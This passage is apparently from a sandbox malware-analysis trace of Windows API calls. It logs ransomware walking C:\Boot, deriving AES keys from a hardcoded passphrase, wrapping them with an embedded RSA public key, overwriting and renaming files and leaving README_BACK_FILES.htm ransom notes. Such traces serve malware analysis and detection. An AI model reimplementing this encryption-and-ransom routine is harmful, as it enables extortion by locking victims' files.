dwFlags=0x0) returned 1 [0231.656] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.656] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.656] FindClose (in: hFindFile=0x2716de8 | out: hFindFile=0x2716de8) returned 1 [0231.656] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-BR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pt-br\\readme_back_files.htm")) returned 0x20 [0231.656] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.656] FindFirstFileA (in: lpFileName="C:\\\\Boot\\pt-PT\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x27167e8 [0231.658] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.658] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.658] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.658] GetLastError () returned 0x12 [0231.658] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0231.658] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.659] CreateFileA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.659] CreateFileA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.659] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.659] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2780de0) returned 1 [0231.661] CryptCreateHash (in: hProv=0x2780de0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.661] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.661] CryptHashData (hHash=0x27169e8, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.661] CryptDeriveKey (in: hProv=0x2780de0, Algid=0x6610, hBaseData=0x27169e8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716f68) returned 1 [0231.661] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.661] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.661] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781088) returned 1 [0231.661] CryptImportPublicKeyInfo (in: hCryptProv=0x2781088, dwCertEncodingType=0x1, pInfo=0x277c5b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c5e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c5e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716ba8) returned 1 [0231.662] CryptEncrypt (in: hKey=0x2716ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.662] CryptEncrypt (in: hKey=0x2716ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27812a8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27812a8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.662] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27812a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.662] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2788b28, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2788b28, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.662] CryptEncrypt (in: hKey=0x2716f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2788b28*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2788b28*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.662] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2788b28, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.662] CloseHandle (hObject=0xffffffff) returned 1 [0231.662] CloseHandle (hObject=0xffffffff) returned 1 [0231.662] CopyFileA (lpExistingFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.662] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.662] DeleteFileA (lpFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.gsg")) returned 0 [0231.663] MoveFileA (lpExistingFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-PT\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.fuck")) returned 0 [0231.663] CryptDestroyHash (hHash=0x27169e8) returned 1 [0231.663] CryptDestroyKey (hKey=0x2716f68) returned 1 [0231.663] CryptReleaseContext (hProv=0x2780de0, dwFlags=0x0) returned 1 [0231.663] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.663] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.663] GetLastError () returned 0x5 [0231.663] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui")) returned 0x20 [0231.663] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.663] CreateFileA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.664] CreateFileA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.664] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.664] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.666] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.666] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.666] CryptHashData (hHash=0x27169e8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.666] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x27169e8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716f68) returned 1 [0231.666] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.666] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.666] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2780d58) returned 1 [0231.666] CryptImportPublicKeyInfo (in: hCryptProv=0x2780d58, dwCertEncodingType=0x1, pInfo=0x277c680*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c6b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c6b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716828) returned 1 [0231.666] CryptEncrypt (in: hKey=0x2716828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.666] CryptEncrypt (in: hKey=0x2716828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27813b8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27813b8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.666] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27813b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.666] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2788b28, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2788b28, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.666] CryptEncrypt (in: hKey=0x2716f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2788b28*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2788b28*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.667] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2788b28, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.667] CloseHandle (hObject=0xffffffff) returned 1 [0231.667] CloseHandle (hObject=0xffffffff) returned 1 [0231.667] CopyFileA (lpExistingFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.667] SetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.667] DeleteFileA (lpFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.gsg")) returned 0 [0231.667] MoveFileA (lpExistingFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\pt-PT\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui.fuck")) returned 0 [0231.668] CryptDestroyHash (hHash=0x27169e8) returned 1 [0231.668] CryptDestroyKey (hKey=0x2716f68) returned 1 [0231.668] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.668] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.668] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.668] FindClose (in: hFindFile=0x27167e8 | out: hFindFile=0x27167e8) returned 1 [0231.668] GetFileAttributesA (lpFileName="C:\\\\Boot\\pt-PT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\pt-pt\\readme_back_files.htm")) returned 0x20 [0231.668] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.668] FindFirstFileA (in: lpFileName="C:\\\\Boot\\qps-ploc\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716de8 [0231.669] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.669] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.669] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.670] GetLastError () returned 0x12 [0231.670] GetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui")) returned 0x20 [0231.670] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.670] CreateFileA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.670] CreateFileA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.670] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.671] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.673] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.673] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.673] CryptHashData (hHash=0x2716c28, pbData=0x2ec8f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.673] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716c28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716b28) returned 1 [0231.673] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.673] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.673] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2780de0) returned 1 [0231.674] CryptImportPublicKeyInfo (in: hCryptProv=0x2780de0, dwCertEncodingType=0x1, pInfo=0x277c820*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c850*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c858*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27169e8) returned 1 [0231.674] CryptEncrypt (in: hKey=0x27169e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.674] CryptEncrypt (in: hKey=0x27169e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781440*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781440*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.674] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781440, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.674] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.674] CryptEncrypt (in: hKey=0x2716b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.674] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.674] CloseHandle (hObject=0xffffffff) returned 1 [0231.674] CloseHandle (hObject=0xffffffff) returned 1 [0231.674] CopyFileA (lpExistingFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.675] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.675] DeleteFileA (lpFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.gsg")) returned 0 [0231.675] MoveFileA (lpExistingFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\qps-ploc\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui.fuck")) returned 0 [0231.675] CryptDestroyHash (hHash=0x2716c28) returned 1 [0231.675] CryptDestroyKey (hKey=0x2716b28) returned 1 [0231.675] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.675] FindNextFileA (in: hFindFile=0x2716de8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.675] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.676] GetLastError () returned 0x5 [0231.676] GetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui")) returned 0x20 [0231.676] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.676] CreateFileA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.677] CreateFileA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.677] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.677] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781b28) returned 1 [0231.679] CryptCreateHash (in: hProv=0x2781b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.679] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.679] CryptHashData (hHash=0x2716f68, pbData=0x2eca30, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.679] CryptDeriveKey (in: hProv=0x2781b28, Algid=0x6610, hBaseData=0x2716f68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x27167e8) returned 1 [0231.679] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.679] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.679] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781770) returned 1 [0231.679] CryptImportPublicKeyInfo (in: hCryptProv=0x2781770, dwCertEncodingType=0x1, pInfo=0x277d040*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d070*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d078*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716be8) returned 1 [0231.679] CryptEncrypt (in: hKey=0x2716be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.680] CryptEncrypt (in: hKey=0x2716be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2780b38*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2780b38*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.680] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2780b38, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.680] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.680] CryptEncrypt (in: hKey=0x27167e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.680] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.680] CloseHandle (hObject=0xffffffff) returned 1 [0231.680] CloseHandle (hObject=0xffffffff) returned 1 [0231.680] CopyFileA (lpExistingFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.680] SetFileAttributesA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.680] DeleteFileA (lpFileName="C:\\\\Boot\\qps-ploc\\memtest.exe.mui.gsg" (normalized: 